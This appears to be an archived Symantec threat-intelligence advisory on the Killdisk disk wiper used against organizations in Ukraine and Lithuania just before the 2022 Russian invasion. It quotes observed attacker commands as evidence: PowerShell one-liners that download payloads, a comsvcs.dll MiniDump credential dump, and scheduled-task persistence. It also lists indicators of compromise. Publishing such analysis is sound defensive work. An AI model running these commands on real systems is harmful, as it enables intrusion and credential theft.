Ukraine: Disk-wiping Attacks Precede Russian Invasion
By About the Author
Archived: 2026-04-05 19:57:26 UTC
UPDATE February 24, 2022, 13:42: This blog has been updated with details about ransomware being used as a
possible decoy during some wiper attacks.
UPDATE February 25, 2022, 17:00: This blog has been updated with details on how a known Microsoft SQL Server 
vulnerability (CVE-2021-1636) was exploited in at least one attack.
A new form of disk-wiping malware (Trojan.Killdisk) was used to attack organizations in Ukraine shortly before the
launch of a Russian invasion this morning (February 24). Symantec, a division of Broadcom Software, has also found
evidence of wiper attacks against machines in Lithuania. Sectors targeted included organizations in the financial,
defense, aviation, and IT services sectors.
Trojan.Killdisk comes in the form of an executable file, which is signed by a certificate issued to Hermetica Digital Ltd.
It contains 32-bit and 64-bit driver files which are compressed by the Lempel-Ziv algorithm stored in their resource
section. The driver files are signed by a certificate issued to EaseUS Partition Master. The malware will drop the
corresponding file according to the operating system (OS) version of the infected system. Driver file names are
generated using the Process ID of the wiper
Once run, the wiper will damage the Master Boot Record (MBR) of the infected computer, rendering it inoperable. The
wiper does not appear to have any additional functionality beyond its destructive capabilities.
Attack chain
Initial indications suggest that the attacks may have been in preparation for some time. Temporal evidence points to
potentially related malicious activity beginning as early as November 2021. However, we are continuing to review and
verify findings.
In the case of an attack against one organization in Ukraine, the attackers appear to have gained access to the network on
December 23, 2021, via malicious SMB activity against a Microsoft Exchange Server. This was immediately followed
by credential theft. A web shell was also installed on January 16, before the wiper was deployed on February 23.
An organization in Lithuania was compromised from at least November 12, 2021, onwards. It appears the attackers may
have leveraged a Tomcat exploit in order to execute a PowerShell command. The decoded PowerShell was used to
download a JPEG file from an internal server, on the victim’s network.
cmd.exe /Q /c powershell -c "(New-Object
System.Net.WebClient).DownloadFile('hxxp://192.168.3.13/email.jpeg','CSIDL_SYSTEM_DRIVE\temp\sys.tmp1')"
1> \\127.0.0.1\ADMIN$\__1636727589.6007507 2>&1
A minute later, the attackers created a scheduled task to execute a suspicious ‘postgresql.exe’ file, weekly on a
Wednesday, specifically at 11:05 local-time. The attackers then ran this scheduled task to execute the task.
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
Page 1 of 3

cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE\temp\sys.tmp1
CSIDL_WINDOWS\policydefinitions\postgresql.exe 1> \\127.0.0.1\ADMIN$\__1636727589.6007507 2>&1
schtasks /run /tn "\Microsoft\Windows\termsrv\licensing\TlsAccess"
Nine minutes later, the attackers modified the scheduled task to execute the same postgres.exe file at 09:30 local-time
instead.
Beginning on February 22, Symantec observed the file ‘postgresql.exe’ being executed and used to perform the
following:
Execute certutil to check connectivity to trustsecpro[.]com and whatismyip[.]com
Execute a PowerShell command to download another JPEG file from a compromised web server -
confluence[.]novus[.]ua
Following this activity, PowerShell was used to dump credentials from the compromised machine:
cmd.exe /Q /c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump 600
C:\asm\appdata\local\microsoft\windows\winupd.log full" 1> \\127.0.0.1\ADMIN$\__1638457529.1247072
2>&1
Later, following the above activity, several unknown PowerShell scripts were executed.
powershell -v 2 -exec bypass -File text.ps1
powershell -exec bypass gp.ps1
powershell -exec bypass -File link.ps1
Five minutes later, the wiper (Trojan.KillDisk) was deployed.
SQL Server exploit
The attackers appear to have used an exploit of a known vulnerability in Microsoft SQL Server (CVE-2021-1636) in
order to compromise at least one of the targeted organisations. In an attack against an organization in Ukraine, the
following process lineage was used to execute the “whoami” command on November 11 2021:
CSIDL_SYSTEM_DRIVE\program files\microsoft sql
server\mssql12.mssqlserver\mssql\binn\sqlservr.exe,CSIDL_SYSTEM\services.exe,CSIDL_SYSTEM\wininit.exe
The next day, the same process lineage was responsible for executing the following PowerShell command:
(New-Object System.Net.WebClient).DownloadFile('hxxp://[INTERNAL_HOST]/label.ico','C:\temp\sys.tmp1')
The organization was running an unpatched version of Microsoft SQL Server.
Ransomware decoy
In several attacks Symantec has investigated to date, ransomware was also deployed against affected organizations at the
same time as the wiper. As with the wiper, scheduled tasks were used to deploy the ransomware. File names used by the
ransomware included client.exe, cdir.exe, cname.exe, connh.exe, and intpub.exe.  It appears likely that the ransomware
was used as a decoy or distraction from the wiper attacks. This has some similarities to the earlier WhisperGate wiper
attacks against Ukraine, where the wiper was disguised as ransomware.
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
Page 2 of 3

Developing situation
With an invasion now underway, there remains a high likelihood of further cyber attacks against Ukraine and other
countries in the region. Symantec’s Threat Hunter Team will continue to actively monitor the situation and post updates
to this blog if new information becomes available.
Protection/Mitigation
Symantec Endpoint products will detect and block this threat using the following signatures:
Trojan.Killdisk
Trojan.Gen.2
Trojan Horse
Ws.Malware.2
For the latest protection updates, please visit the Symantec Protection Bulletin.
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 – Trojan.Killdisk
0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da – Trojan.Killdisk
a64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e – Trojan.Killdisk
4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 - Ransomware
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
Page 3 of 3